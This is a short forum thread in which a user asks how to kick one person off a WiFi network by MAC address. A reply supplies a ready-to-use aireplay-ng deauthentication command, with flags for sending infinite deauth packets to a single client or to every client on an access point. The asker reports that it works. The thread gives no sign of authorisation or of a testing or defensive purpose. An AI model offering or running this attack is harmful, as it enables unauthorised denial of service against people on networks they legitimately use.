Forum Thread: DDoS on WiFi

Hi people, is it possible to do DDoS on network and kick user off using MAC Address ? Because when I've searched on Google, all I've found was "DDoS Wifi Network" or "WiFi Jamming".

Thanks

6 Responses

Try with aireplay-ng.

You could launch a deauthentication attack, kicking them off the network. For more detailed information, see this article.

-Defalt

aireplay-ng -0 0 -a AP's MAC -c Client's MAC wlan0

-0 denotes deauthentication
0 stands for infinite deauth packets, you can choose the amount
-c denotes client, if this is omitted you will deauth all the clients connected to the AP
wlan0 is the interface. Replace it with yours.

Thanks, It's working.

There are several articles on Null Byte on this subject.

Admin, I know, but I want to kick one user, not entire network. And I've been searching on NullByte and I found only WIFI DDOS ATTACK.

Share Your Thoughts

  • Hot
  • Active